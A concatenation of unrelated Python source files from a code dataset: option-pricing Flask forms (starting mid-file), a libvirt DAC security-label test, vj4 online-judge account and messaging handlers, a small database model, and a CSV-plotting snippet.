N = IntegerField('N', validators=[InputRequired()])
Rp = FloatField('Rp', validators=[InputRequired()])
I = IntegerField('I (MC)', validators=[InputRequired()])
M = IntegerField('M (MC)', validators=[InputRequired()])
seedNum = IntegerField('seed (MC)', validators=[InputRequired()])
submit = SubmitField('Calculate')
class pyOptionForm(FlaskForm):
optionStyle = SelectField('style',
choices=[('European','European'),
('BullSpread','BullSpread'),
('BullSpreadPathN','BullSpreadPathN'),
('DoubleNoTouch','DoubleNoTouch'),
('OutOfRangeRate','OutOfRangeRate'),
('DownAndOutAlternative','DownAndOutAlternative'),
('ModerateOption','ModerateOption')], validators=[DataRequired()])
optionType = SelectField('type',
choices=[('call','call'), ('put', 'put')], validators=[DataRequired()])
S0 = FloatField('S0', validators=[InputRequired()])
K = FloatField('K', validators=[InputRequired()])
K1 = FloatField('K1', validators=[InputRequired()])
K2 = FloatField('K2', validators=[InputRequired()])
T = FloatField('T', validators=[InputRequired()])
r = FloatField('r', validators=[InputRequired()])
q = FloatField('q', validators=[InputRequired()])
sigma = FloatField('sigma', validators=[InputRequired()])
N = IntegerField('N', validators=[InputRequired()])
Rp = FloatField('Rp', validators=[InputRequired()])
I = IntegerField('I (MC)', validators=[InputRequired()])
M = IntegerField('M (MC)', validators=[InputRequired()])
seedNum = IntegerField('seed (MC)', validators=[InputRequired()])
submit = SubmitField('Calculate')
class BsmForm(FlaskForm):
S0 = FloatField('S0', validators=[InputRequired()])
K = FloatField('K', validators=[InputRequired()])
T = FloatField('T', validators=[InputRequired()])
r = FloatField('r', validators=[InputRequired()])
q = FloatField('q', validators=[InputRequired()])
sigma = FloatField('sigma', validators=[InputRequired()])
optionType = SelectField('type', choices=[('call','call'), ('put', 'put')], validators=[DataRequired()])
submit = SubmitField('Calculate')
def validate_S0(self, field):
if field.data < 0:
raise ValidationError('S0 > 0')
def validate_K(self, field):
if field.data < 0:
raise ValidationError('K > 0')
def validate_T(self, field):
if field.data < 0:
raise ValidationError('T > 0')
def validate_r(self, field):
if field.data < 0:
raise ValidationError('r > 0')
def validate_q(self, field):
if field.data < 0:
raise ValidationError('q > 0')
def validate_sigma(self, field):
if field.data <= 0:
raise ValidationError('sigma > 0')
def validate_optionType(self, field):
if field.data not in ['call','put']:
raise ValidationError('option type error')
class BullSpreadForm(FlaskForm):
S0 = FloatField('S0', validators=[InputRequired()])
K1 = FloatField('K1', validators=[InputRequired()])
K2 = FloatField('K2', validators=[InputRequired()])
T = FloatField('T', validators=[InputRequired()])
r = FloatField('r', validators=[InputRequired()])
q = FloatField('q', validators=[InputRequired()])
sigma = FloatField('sigma', validators=[InputRequired()])
optionType = SelectField('type', choices=[('call','call'), ('put', 'put')], validators=[DataRequired()])
submit = SubmitField('Calculate')
def validate_S0(self, field):
if field.data < 0:
raise ValidationError('S0 > 0')
def validate_K1(self, field):
if field.data < 0:
raise ValidationError('K1 > 0')
def validate_K2(self, field):
if field.data < 0:
raise ValidationError('K2 > 0')
def validate_T(self, field):
if field.data < 0:
raise ValidationError('T > 0')
def validate_r(self, field):
if field.data < 0:
raise ValidationError('r > 0')
def validate_q(self, field):
if field.data < 0:
raise ValidationError('q > 0')
def validate_sigma(self, field):
if field.data <= 0:
raise ValidationError('sigma > 0')
def validate_optionType(self, field):
if field.data not in ['call','put']:
raise ValidationError('option type error')
class OptionMCSForm1(FlaskForm):
S0 = FloatField('S0', validators=[InputRequired()])
K1 = FloatField('K1', validators=[InputRequired()])
K2 = FloatField('K2', validators=[InputRequired()])
T = FloatField('T', validators=[InputRequired()])
r = FloatField('r', validators=[InputRequired()])
q = FloatField('q', validators=[InputRequired()])
sigma = FloatField('sigma', validators=[InputRequired()])
N = IntegerField('N', validators=[InputRequired()])
optionType = SelectField('type', choices=[('call','call'), ('put', 'put')], validators=[DataRequired()])
optionStyle = SelectField('style',
choices=[('BullSpreadPathN','BullSpreadPathN')], validators=[DataRequired()])
I = IntegerField('I (MC)', validators=[InputRequired()])
M = IntegerField('M (MC)', validators=[InputRequired()])
seedNum = IntegerField('seed (MC)', validators=[InputRequired()])
submit = SubmitField('Calculate')
def validate_S0(self, field):
if field.data < 0:
raise ValidationError('S0 >= 0')
def validate_K1(self, field):
if field.data < 0:
raise ValidationError('K1 >= 0')
def validate_K2(self, field):
if field.data < 0:
raise ValidationError('K2 >= 0')
def validate_T(self, field):
if field.data <= 0:
raise ValidationError('T > 0')
def validate_r(self, field):
if field.data < 0:
raise ValidationError('r >= 0')
def validate_q(self, field):
if field.data < 0:
raise ValidationError('q >= 0')
def validate_sigma(self, field):
if field.data <= 0:
raise ValidationError('sigma > 0')
def validate_N(self, field):
if field.data <= 0:
raise ValidationError('N > 0')
def validate_optionType(self, field):
if field.data not in ['call','put']:
raise ValidationError('option type error')
def validate_optionStyle(self, field):
if field.data not in ['BullSpreadPathN']:
raise ValidationError('option style error')
def validate_I(self, field):
if field.data < 0:
raise ValidationError('I > 0')
def validate_M(self, field):
if field.data <= 0:
raise ValidationError('M > 0')
def validate_seedNum(self, field):
if field.data < 0:
raise ValidationError('seed > 0')
class OptionMCSForm2(FlaskForm):
S0 = FloatField('S0', validators=[InputRequired()])
K1 = FloatField('K1', validators=[InputRequired()])
K2 = FloatField('K2', validators=[InputRequired()])
T = FloatField('T', validators=[InputRequired()])
r = FloatField('r', validators=[InputRequired()])
q = FloatField('q', validators=[InputRequired()])
sigma = FloatField('sigma', validators=[InputRequired()])
Rp = FloatField('Rp', validators=[InputRequired()])
optionType = SelectField('type', choices=[('call','call'), ('put', 'put')], validators=[DataRequired()])
optionStyle = SelectField('style',
choices=[('DoubleNoTouch','DoubleNoTouch'),
('OutOfRangeRate','OutOfRangeRate')], validators=[DataRequired()])
I = IntegerField('I (MC)', validators=[InputRequired()])
M = IntegerField('M (MC)', validators=[InputRequired()])
seedNum = IntegerField('seed (MC)', validators=[InputRequired()])
submit = SubmitField('Calculate')
def validate_S0(self, field):
if field.data < 0:
raise ValidationError('S0 >= 0')
def validate_K1(self, field):
if field.data < 0:
raise ValidationError('K1 >= 0')
def validate_K2(self, field):
if field.data < 0:
raise ValidationError('K2 >= 0')
def validate_T(self, field):
if field.data <= 0:
raise ValidationError('T > 0')
def validate_r(self, field):
if field.data < 0:
raise ValidationError('r >= 0')
def validate_q(self, field):
if field.data < 0:
raise ValidationError('q >= 0')
def validate_sigma(self, field):
if field.data <= 0:
raise ValidationError('sigma > 0')
def validate_Rp(self, field):
if field.data < 0:
raise ValidationError('Rp >= 0')
def validate_optionType(self, field):
if field.data not in ['call','put']:
raise ValidationError('option type error')
def validate_optionStyle(self, field):
if field.data not in ['DoubleNoTouch','OutOfRangeRate']:
raise ValidationError('option style error')
def validate_I(self, field):
if field.data < 0:
raise ValidationError('I > 0')
def validate_M(self, field):
if field.data <= 0:
raise ValidationError('M > 0')
def validate_seedNum(self, field):
if field.data < 0:
raise ValidationError('seed > 0')
class OptionMCSForm3(FlaskForm):
S0 = FloatField('S0', validators=[InputRequired()])
K = FloatField('K', validators=[InputRequired()])
T = FloatField('T', validators=[InputRequired()])
r = FloatField('r', validators=[InputRequired()])
q = FloatField('q', validators=[InputRequired()])
sigma = FloatField('sigma', validators=[InputRequired()])
Rp = FloatField('Rp', validators=[InputRequired()])
optionType = SelectField('type', choices=[('call','call'), ('put', 'put')], validators=[DataRequired()])
optionStyle = SelectField('style',
choices=[('DownAndOutAlternative','DownAndOutAlternative'),
('ModerateOption','ModerateOption')], validators=[DataRequired()])
I = IntegerField('I (MC)', validators=[InputRequired()])
M = IntegerField('M (MC)', validators=[InputRequired()])
seedNum = IntegerField('seed (MC)', validators=[InputRequired()])
submit = SubmitField('Calculate')
def validate_S0(self, field):
if field.data < 0:
raise ValidationError('S0 >= 0')
def validate_K(self, field):
if field.data < 0:
raise ValidationError('K1 >= 0')
def validate_T(self, field):
if field.data <= 0:
raise ValidationError('T > 0')
def validate_r(self, field):
if field.data < 0:
raise ValidationError('r >= 0')
def validate_q(self, field):
if field.data < 0:
raise ValidationError('q >= 0')
def validate_sigma(self, field):
if field.data <= 0:
raise ValidationError('sigma > 0')
def validate_Rp(self, field):
if field.data < 0:
raise ValidationError('Rp >= 0')
def validate_optionType(self, field):
if field.data not in ['call','put']:
raise ValidationError('option type error')
def validate_optionStyle(self, field):
if field.data not in ['DownAndOutAlternative','ModerateOption']:
raise ValidationError('option style error')
def validate_I(self, field):
if field.data < 0:
raise ValidationError('I > 0')
def validate_M(self, field):
if field.data <= 0:
raise ValidationError('M > 0')
def validate_seedNum(self, field):
if field.data < 0:
raise ValidationError('seed > 0')
class ItemTable(Table):
classes = ['table','table-striped']
name = Col('name')
valuation = Col('valuation')
ratio = Col('ratio (v/S0)')
| lyhrobin00007/FlaskCTA | app/pyOption/forms.py | Python | mit | 13,561 |
import os
import stat
import pwd
import grp
import logging
from autotest.client import utils
from autotest.client.shared import error
from virttest import utils_selinux
from virttest import virt_vm
from virttest import utils_config
from virttest import utils_libvirtd
from virttest.libvirt_xml.vm_xml import VMXML
def check_qemu_grp_user(user):
"""
Check the given user exist and in 'qemu' group
:param user: given user name or id
:return: True or False
"""
try:
# check the user exist or not
user_id = None
user_name = None
try:
user_id = int(user)
except ValueError:
user_name = user
if user_id:
pw_user = pwd.getpwuid(user_id)
else:
pw_user = pwd.getpwnam(user_name)
user_name = pw_user.pw_name
# check the user is in 'qemu' group
grp_names = []
for g in grp.getgrall():
if user_name in g.gr_mem:
grp_names.append(g.gr_name)
grp_names.append(str(g.gr_gid))
if "qemu" in grp_names:
return True
else:
err_msg = "The given user: %s exist " % user
err_msg += "but not in 'qemu' group."
raise error.TestFail(err_msg)
except KeyError:
return False
def format_user_group_str(user, group):
"""
Check given user and group, then return "uid:gid" string
:param user: given user name or id string
:param group: given group name or id string
:return: "uid:gid" string
"""
try:
user_id = int(user)
except ValueError:
try:
user_id = pwd.getpwnam(user).pw_uid
except KeyError:
# user did not exist will definitly fail start domain, log warning
# here, let the test continue
logging.warning("the user name: %s not found on host" % user)
user_id = user
try:
grp_id = int(group)
except ValueError:
try:
grp_id = grp.getgrnam(group).gr_gid
except KeyError:
# group name not exist will fail start vm, only add warning info
# here, let the test continue
logging.warning("the group name: %s not found on host" % group)
grp_id = group
label_str = "%s:%s" % (user_id, grp_id)
return label_str
def run(test, params, env):
"""
Test DAC setting in both domain xml and qemu.conf.
(1) Init variables for test.
(2) Set VM xml and qemu.conf with proper DAC label, also set image and
monitor socket parent dir with propoer ownership and mode.
(3) Start VM and check the context.
(4) Destroy VM and check the context.
"""
# Get general variables.
status_error = ('yes' == params.get("status_error", 'no'))
host_sestatus = params.get("dac_start_destroy_host_selinux", "enforcing")
qemu_group_user = "yes" == params.get("qemu_group_user", "no")
# Get variables about seclabel for VM.
sec_type = params.get("dac_start_destroy_vm_sec_type", "dynamic")
sec_model = params.get("dac_start_destroy_vm_sec_model", "dac")
sec_label = params.get("dac_start_destroy_vm_sec_label", None)
sec_relabel = params.get("dac_start_destroy_vm_sec_relabel", "yes")
security_default_confined = params.get("security_default_confined", None)
set_process_name = params.get("set_process_name", None)
sec_dict = {'type': sec_type, 'model': sec_model, 'relabel': sec_relabel}
if sec_label:
sec_dict['label'] = sec_label
set_sec_label = "yes" == params.get("set_sec_label", "no")
set_qemu_conf = "yes" == params.get("set_qemu_conf", "no")
# Get qemu.conf config variables
qemu_user = params.get("qemu_user", None)
qemu_group = params.get("qemu_group", None)
dynamic_ownership = "yes" == params.get("dynamic_ownership", "yes")
# Get variables about VM and get a VM object and VMXML instance.
vm_name = params.get("main_vm")
vm = env.get_vm(vm_name)
vmxml = VMXML.new_from_inactive_dumpxml(vm_name)
backup_xml = vmxml.copy()
# Get varialbles about image.
img_label = params.get('dac_start_destroy_disk_label')
# Label the disks of VM with img_label.
disks = vm.get_disk_devices()
backup_labels_of_disks = {}
qemu_disk_mod = False
for disk in disks.values():
disk_path = disk['source']
f = os.open(disk_path, 0)
stat_re = os.fstat(f)
backup_labels_of_disks[disk_path] = "%s:%s" % (stat_re.st_uid,
stat_re.st_gid)
label_list = img_label.split(":")
os.chown(disk_path, int(label_list[0]), int(label_list[1]))
os.close(f)
st = os.stat(disk_path)
if not bool(st.st_mode & stat.S_IWGRP):
# add group wirte mode to disk by chmod g+w
os.chmod(disk_path, st.st_mode | stat.S_IWGRP)
qemu_disk_mod = True
# Set selinux of host.
backup_sestatus = utils_selinux.get_status()
utils_selinux.set_status(host_sestatus)
def _create_user():
"""
Create a "vdsm_fake" in 'qemu' group for test
"""
logging.debug("create a user 'vdsm_fake' in 'qemu' group")
cmd = "useradd vdsm_fake -G qemu -s /sbin/nologin"
utils.run(cmd, ignore_status=False)
create_qemu_user = False
qemu_sock_mod = False
qemu_sock_path = '/var/lib/libvirt/qemu/'
qemu_conf = utils_config.LibvirtQemuConfig()
libvirtd = utils_libvirtd.Libvirtd()
try:
# Check qemu_group_user
if qemu_group_user:
if set_qemu_conf:
if "EXAMPLE" in qemu_user:
if not check_qemu_grp_user("vdsm_fake"):
_create_user()
create_qemu_user = True
qemu_user = "vdsm_fake"
qemu_group = "qemu"
if set_sec_label:
if sec_label:
if "EXAMPLE" in sec_label:
if not check_qemu_grp_user("vdsm_fake"):
_create_user()
create_qemu_user = True
sec_label = "vdsm_fake:qemu"
sec_dict['label'] = sec_label
st = os.stat(qemu_sock_path)
if not bool(st.st_mode & stat.S_IWGRP):
# chmod g+w
os.chmod(qemu_sock_path, st.st_mode | stat.S_IWGRP)
qemu_sock_mod = True
if set_qemu_conf:
# Transform qemu user and group to "uid:gid"
qemu_user = qemu_user.replace("+", "")
qemu_group = qemu_group.replace("+", "")
qemu_conf_label_trans = format_user_group_str(qemu_user, qemu_group)
# Set qemu.conf for user and group
if qemu_user:
qemu_conf.user = qemu_user
if qemu_group:
qemu_conf.group = qemu_group
if dynamic_ownership:
qemu_conf.dynamic_ownership = 1
else:
qemu_conf.dynamic_ownership = 0
if security_default_confined:
qemu_conf.security_default_confined = security_default_confined
if set_process_name:
qemu_conf.set_process_name = set_process_name
logging.debug("the qemu.conf content is: %s" % qemu_conf)
libvirtd.restart()
if set_sec_label:
# Transform seclabel to "uid:gid"
if sec_label:
sec_label = sec_label.replace("+", "")
if ":" in sec_label:
user, group = sec_label.split(":")
sec_label_trans = format_user_group_str(user, group)
# Set the context of the VM.
logging.debug("sec_dict is %s" % sec_dict)
vmxml.set_seclabel([sec_dict])
vmxml.sync()
logging.debug("updated domain xml is: %s" % vmxml.xmltreefile)
# Start VM to check the qemu process and image.
try:
vm.start()
# Start VM successfully.
# VM with seclabel can access the image with the context.
if status_error:
raise error.TestFail("Test succeeded in negative case.")
# Get vm process label when VM is running.
vm_pid = vm.get_pid()
pid_stat = os.stat("/proc/%d" % vm_pid)
vm_process_uid = pid_stat.st_uid
vm_process_gid = pid_stat.st_gid
vm_context = "%s:%s" % (vm_process_uid, vm_process_gid)
# Get vm image label when VM is running
f = os.open(disks.values()[0]['source'], 0)
stat_re = os.fstat(f)
disk_context = "%s:%s" % (stat_re.st_uid, stat_re.st_gid)
os.close(f)
# Check vm process and image DAC label after vm start
if set_sec_label and sec_label:
if ":" in sec_label:
if vm_context != sec_label_trans:
raise error.TestFail("Label of VM processs is not "
"expected after starting.\nDetail:"
"vm_context=%s, sec_label_trans=%s"
% (vm_context, sec_label_trans))
if sec_relabel == "yes":
if dynamic_ownership:
if disk_context != sec_label_trans:
raise error.TestFail("Label of disk is not " +
"expected" +
" after VM starting.\n" +
"Detail: disk_context" +
"=%s" % disk_context +
", sec_label_trans=%s."
% sec_label_trans)
elif set_qemu_conf and not security_default_confined:
if vm_context != qemu_conf_label_trans:
raise error.TestFail("Label of VM processs is not expected"
" after starting.\nDetail: vm_context="
"%s, qemu_conf_label_trans=%s"
% (vm_context, qemu_conf_label_trans))
if disk_context != qemu_conf_label_trans:
if dynamic_ownership:
raise error.TestFail("Label of disk is not expected " +
"after VM starting.\nDetail: di" +
"sk_context=%s, " % disk_context +
"qemu_conf_label_trans=%s." %
qemu_conf_label_trans)
# check vm started with -name $vm_name,process=qemu:$vm_name
if set_process_name:
chk_str = "-name %s,process=qemu:%s" % (vm_name, vm_name)
cmd = "ps -p %s -o command=" % vm_pid
result = utils.run(cmd)
if chk_str in result.stdout:
logging.debug("%s found in vm process command: %s" %
(chk_str, result.stdout))
else:
raise error.TestFail("%s not in vm process command: %s" %
(chk_str, result.stdout))
# Check the label of disk after VM being destroyed.
vm.destroy()
f = os.open(disks.values()[0]['source'], 0)
stat_re = os.fstat(f)
img_label_after = "%s:%s" % (stat_re.st_uid, stat_re.st_gid)
os.close(f)
if set_sec_label and sec_relabel == "yes":
# As dynamic_ownership as 1 on non-share fs, current domain
# image will restore to 0:0 when sec_relabel enabled.
if dynamic_ownership:
if not img_label_after == "0:0":
raise error.TestFail("Label of disk is img_label_after"
":%s" % img_label_after + ", it "
"did not restore to 0:0 in VM "
"shuting down.")
elif set_qemu_conf and not set_sec_label:
# As dynamic_ownership as 1 on non-share fs, current domain
# image will restore to 0:0 when only set qemu.conf.
if dynamic_ownership:
if not img_label_after == "0:0":
raise error.TestFail("Label of disk is img_label_after"
":%s" % img_label_after + ", it "
"did not restore to 0:0 in VM "
"shuting down.")
else:
if (not img_label_after == img_label):
raise error.TestFail("Bug: Label of disk is changed\n"
"Detail: img_label_after=%s, "
"img_label=%s.\n"
% (img_label_after, img_label))
except virt_vm.VMStartError, e:
# Starting VM failed.
# VM with seclabel can not access the image with the context.
if not status_error:
err_msg = "Domain start fail not due to DAC setting, check "
err_msg += "more in https://bugzilla.redhat.com/show_bug"
err_msg += ".cgi?id=856951"
if set_sec_label:
if sec_label:
if sec_relabel == "yes" and sec_label_trans == "0:0":
if set_qemu_conf:
if qemu_conf_label_trans == "107:107":
raise error.TestNAError(err_msg)
elif sec_relabel == "no" and sec_label_trans == "0:0":
if not set_qemu_conf:
raise error.TestNAError(err_msg)
else:
raise error.TestFail("Test failed in positive case."
"error: %s" % e)
finally:
# clean up
for path, label in backup_labels_of_disks.items():
label_list = label.split(":")
os.chown(path, int(label_list[0]), int(label_list[1]))
if qemu_disk_mod:
st = os.stat(path)
os.chmod(path, st.st_mode ^ stat.S_IWGRP)
if set_sec_label:
backup_xml.sync()
if qemu_sock_mod:
st = os.stat(qemu_sock_path)
os.chmod(qemu_sock_path, st.st_mode ^ stat.S_IWGRP)
if set_qemu_conf:
qemu_conf.restore()
libvirtd.restart()
if create_qemu_user:
cmd = "userdel -r vdsm_fake"
output = utils.run(cmd, ignore_status=True)
utils_selinux.set_status(backup_sestatus)
| waynesun09/tp-libvirt | libvirt/tests/src/svirt/dac_start_destroy.py | Python | gpl-2.0 | 15,257 |
import asyncio
import hmac
import itertools
from bson import objectid
from vj4 import app
from vj4 import error
from vj4.model import builtin
from vj4.model import document
from vj4.model import domain
from vj4.model import fs
from vj4.model import message
from vj4.model import token
from vj4.model import user
from vj4.model.adaptor import setting
from vj4.model.adaptor import userfile
from vj4.handler import base
from vj4.service import bus
from vj4.util import useragent
from vj4.util import geoip
from vj4.util import misc
from vj4.util import options
from vj4.util import validator
TOKEN_TYPE_TEXTS = {
token.TYPE_SAVED_SESSION: 'Saved session',
token.TYPE_UNSAVED_SESSION: 'Temporary session',
}
@app.route('/home/security', 'home_security', global_route=True)
class HomeSecurityHandler(base.OperationHandler):
@base.require_priv(builtin.PRIV_USER_PROFILE)
async def get(self):
# TODO(iceboy): pagination? or limit session count for uid?
sessions = await token.get_session_list_by_uid(self.user['_id'])
annotated_sessions = list({
**session,
'update_ua': useragent.parse(session.get('update_ua') or
session.get('create_ua') or ''),
'update_geoip': geoip.ip2geo(session.get('update_ip') or
session.get('create_ip'),
self.get_setting('view_lang')),
'token_digest': hmac.new(b'token_digest', session['_id'], 'sha256').hexdigest(),
'is_current': session['_id'] == self.session['_id']
} for session in sessions)
self.render('home_security.html', sessions=annotated_sessions)
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.require_csrf_token
@base.sanitize
async def post_change_password(self, *,
current_password: str,
new_password: str,
verify_password: str):
if new_password != verify_password:
raise error.VerifyPasswordError()
doc = await user.change_password(self.user['_id'], current_password, new_password)
if not doc:
raise error.CurrentPasswordError(self.user['_id'])
self.json_or_redirect(self.url)
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.require_csrf_token
@base.sanitize
@base.limit_rate('send_mail', 3600, 30)
async def post_change_mail(self, *, current_password: str, mail: str):
validator.check_mail(mail)
udoc, mail_holder_udoc = await asyncio.gather(
user.check_password_by_uid(self.user['_id'], current_password),
user.get_by_mail(mail))
# TODO(twd2): raise other errors.
if not udoc:
raise error.CurrentPasswordError(self.user['uname'])
if mail_holder_udoc:
raise error.UserAlreadyExistError(mail)
rid, _ = await token.add(token.TYPE_CHANGEMAIL,
options.changemail_token_expire_seconds,
uid=udoc['_id'], mail=mail)
await self.send_mail(mail, 'Change Email', 'user_changemail_mail.html',
url=self.reverse_url('user_changemail_with_code', code=rid),
uname=udoc['uname'])
self.render('user_changemail_mail_sent.html')
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.require_csrf_token
@base.sanitize
async def post_delete_token(self, *, token_type: int, token_digest: str):
sessions = await token.get_session_list_by_uid(self.user['_id'])
for session in sessions:
if (token_type == session['token_type'] and
token_digest == hmac.new(b'token_digest', session['_id'], 'sha256').hexdigest()):
await token.delete_by_hashed_id(session['_id'], session['token_type'])
break
else:
raise error.InvalidTokenDigestError(token_type, token_digest)
self.json_or_redirect(self.url)
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.require_csrf_token
async def post_delete_all_tokens(self):
await token.delete_by_uid(self.user['_id'])
self.json_or_redirect(self.url)
@app.route('/home/security/changemail/{code}', 'user_changemail_with_code', global_route=True)
class UserChangemailWithCodeHandler(base.Handler):
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.route_argument
@base.sanitize
async def get(self, *, code: str):
tdoc = await token.get(code, token.TYPE_CHANGEMAIL)
if not tdoc or tdoc['uid'] != self.user['_id']:
raise error.InvalidTokenError(token.TYPE_CHANGEMAIL, code)
mail_holder_udoc = await user.get_by_mail(tdoc['mail'])
if mail_holder_udoc:
raise error.UserAlreadyExistError(tdoc['mail'])
# TODO(twd2): Ensure mail is unique.
await user.set_mail(self.user['_id'], tdoc['mail'])
await token.delete(code, token.TYPE_CHANGEMAIL)
self.json_or_redirect(self.reverse_url('home_security'))
@app.route('/home/account', 'home_account', global_route=True)
class HomeAccountHandler(base.Handler):
@base.require_priv(builtin.PRIV_USER_PROFILE)
async def get(self):
self.render('home_settings.html', category='account', settings=setting.ACCOUNT_SETTINGS)
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.post_argument
@base.require_csrf_token
async def post(self, **kwargs):
await self.set_settings(**kwargs)
self.json_or_redirect(self.url)
@app.route('/home/domain/account', 'home_domain_account', global_route=False)
class HomeDomainAccountHandler(base.Handler):
@base.require_priv(builtin.PRIV_USER_PROFILE)
async def get(self):
self.render('home_settings.html', category='domain_account', settings=setting.DOMAIN_ACCOUNT_SETTINGS)
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.post_argument
@base.require_csrf_token
async def post(self, **kwargs):
await self.set_settings(**kwargs)
self.json_or_redirect(self.url)
@app.route('/home/preference', 'home_preference', global_route=True)
class HomeAccountHandler(base.Handler):
@base.require_priv(builtin.PRIV_USER_PROFILE)
async def get(self):
self.render('home_settings.html', category='preference', settings=setting.PREFERENCE_SETTINGS)
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.post_argument
@base.require_csrf_token
async def post(self, **kwargs):
await self.set_settings(**kwargs)
self.json_or_redirect(self.url)
@app.route('/home/messages', 'home_messages', global_route=True)
class HomeMessagesHandler(base.OperationHandler):
def modify_udoc(self, udict, key):
udoc = udict.get(key)
if not udoc:
return
gravatar_url = misc.gravatar_url(udoc.get('gravatar'))
if 'gravatar' in udoc and udoc['gravatar']:
udict[key] = {**udoc,
'gravatar_url': gravatar_url,
'gravatar': ''}
@base.require_priv(builtin.PRIV_USER_PROFILE)
async def get(self):
# TODO(iceboy): projection, pagination.
mdocs = await message.get_multi(self.user['_id']).sort([('_id', -1)]).limit(50).to_list()
udict = await user.get_dict(
itertools.chain.from_iterable((mdoc['sender_uid'], mdoc['sendee_uid']) for mdoc in mdocs),
fields=user.PROJECTION_PUBLIC)
# TODO(twd2): improve here:
for mdoc in mdocs:
self.modify_udoc(udict, mdoc['sender_uid'])
self.modify_udoc(udict, mdoc['sendee_uid'])
self.json_or_render('home_messages.html', messages=mdocs, udict=udict)
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.require_csrf_token
@base.sanitize
async def post_send_message(self, *, uid: int, content: str):
udoc = await user.get_by_uid(uid, user.PROJECTION_PUBLIC)
if not udoc:
raise error.UserNotFoundError(uid)
mdoc = await message.add(self.user['_id'], udoc['_id'], content)
# TODO(twd2): improve here:
# projection
sender_udoc = await user.get_by_uid(self.user['_id'], user.PROJECTION_PUBLIC)
mdoc['sender_udoc'] = sender_udoc
self.modify_udoc(mdoc, 'sender_udoc')
mdoc['sendee_udoc'] = udoc
self.modify_udoc(mdoc, 'sendee_udoc')
if self.user['_id'] != uid:
await bus.publish('message_received-' + str(uid), {'type': 'new', 'data': mdoc})
self.json_or_redirect(self.url, mdoc=mdoc)
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.require_csrf_token
@base.sanitize
async def post_reply_message(self, *, message_id: objectid.ObjectId, content: str):
mdoc, reply = await message.add_reply(message_id, self.user['_id'], content)
if not mdoc:
return error.MessageNotFoundError(message_id)
if mdoc['sender_uid'] != mdoc['sendee_uid']:
if mdoc['sender_uid'] == self.user['_id']:
other_uid = mdoc['sendee_uid']
else:
other_uid = mdoc['sender_uid']
mdoc['reply'] = [reply]
await bus.publish('message_received-' + str(other_uid), {'type': 'reply', 'data': mdoc})
self.json_or_redirect(self.url, reply=reply)
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.require_csrf_token
@base.sanitize
async def post_delete_message(self, *, message_id: objectid.ObjectId):
await message.delete(message_id, self.user['_id'])
self.json_or_redirect(self.url)
@app.connection_route('/home/messages-conn', 'home_messages-conn', global_route=True)
class HomeMessagesConnection(base.Connection):
@base.require_priv(builtin.PRIV_USER_PROFILE)
async def on_open(self):
await super(HomeMessagesConnection, self).on_open()
bus.subscribe(self.on_message_received, ['message_received-' + str(self.user['_id'])])
async def on_message_received(self, e):
self.send(**e['value'])
async def on_close(self):
bus.unsubscribe(self.on_message_received)
@app.route('/home/domain', 'home_domain', global_route=True)
class HomeDomainHandler(base.Handler):
@base.require_priv(builtin.PRIV_USER_PROFILE)
async def get(self):
pending_ddocs = await domain.get_pending(owner_uid=self.user['_id']) \
.to_list()
dudict = await domain.get_dict_user_by_domain_id(self.user['_id'])
dids = list(dudict.keys())
ddocs = await domain.get_multi(_id={'$in': dids}) \
.to_list()
can_manage = {}
for ddoc in builtin.DOMAINS + ddocs:
role = dudict.get(ddoc['_id'], {}).get('role', builtin.ROLE_DEFAULT)
mask = domain.get_all_roles(ddoc).get(role, builtin.PERM_NONE)
can_manage[ddoc['_id']] = (
((builtin.PERM_EDIT_DESCRIPTION | builtin.PERM_EDIT_PERM) & mask) != 0
or self.has_priv(builtin.PRIV_MANAGE_ALL_DOMAIN))
self.render('home_domain.html', pending_ddocs=pending_ddocs, ddocs=ddocs, dudict=dudict, can_manage=can_manage)
@base.post_argument
@base.require_csrf_token
@base.sanitize
async def post(self, *, domain_id: str):
await domain.add_continue(domain_id, self.user['_id'])
self.json_or_redirect(self.url)
@app.route('/home/domain/create', 'home_domain_create', global_route=True)
class HomeDomainCreateHandler(base.Handler):
@base.require_priv(builtin.PRIV_CREATE_DOMAIN)
async def get(self):
self.render('home_domain_create.html')
@base.require_priv(builtin.PRIV_CREATE_DOMAIN)
@base.post_argument
@base.require_csrf_token
@base.sanitize
async def post(self, *, id: str, name: str, gravatar: str, bulletin: str):
domain_id = await domain.add(id, self.user['_id'], name=name,
gravatar=gravatar, bulletin=bulletin)
self.json_or_redirect(self.reverse_url('domain_manage', domain_id=domain_id))
@app.route('/home/file', 'home_file', global_route=True)
class HomeFileHandler(base.OperationHandler):
def file_url(self, fdoc):
return options.cdn_prefix.rstrip('/') + \
self.reverse_url('fs_get', domain_id=builtin.DOMAIN_ID_SYSTEM,
secret=fdoc['metadata']['secret'])
@base.require_priv(builtin.PRIV_USER_PROFILE)
async def get(self):
ufdocs = await userfile.get_multi(owner_uid=self.user['_id']).to_list()
fdict = await fs.get_meta_dict(ufdoc.get('file_id') for ufdoc in ufdocs)
self.render('home_file.html', ufdocs=ufdocs, fdict=fdict)
@base.require_priv(builtin.PRIV_USER_PROFILE)
@base.post_argument
@base.require_csrf_token
@base.sanitize
async def post_delete(self, *, ufid: document.convert_doc_id):
ufdoc = await userfile.get(ufid)
if not self.own(ufdoc, priv=builtin.PRIV_DELETE_FILE_SELF):
self.check_priv(builtin.PRIV_DELETE_FILE)
result = await userfile.delete(ufdoc['doc_id'])
if result:
await userfile.dec_usage(self.user['_id'], ufdoc['length'])
self.redirect(self.referer_or_main)
| vijos/vj4 | vj4/handler/home.py | Python | agpl-3.0 | 12,558 |
from models import db
from models.Post import Post
class PostFile(db.Model):
__tablename__ = 'PostFile'
Id = db.Column(db.Integer, primary_key = True)
Post = db.Column(db.Integer, db.ForeignKey(Post.Id))
FileName = db.Column(db.String(128))
def __init__(self, post, file):
self.Post = post
self.FileName = file
| goors/flask-microblog | models/PostFile.py | Python | apache-2.0 | 335 |
import matplotlib.pyplot as plt
import numpy as np
data = np.loadtxt(open("csv files/GT_T_009991.csv","rb"),delimiter=",",skiprows=0)
# arr=[[1,3],[1,2],[2,3],[1,4]]
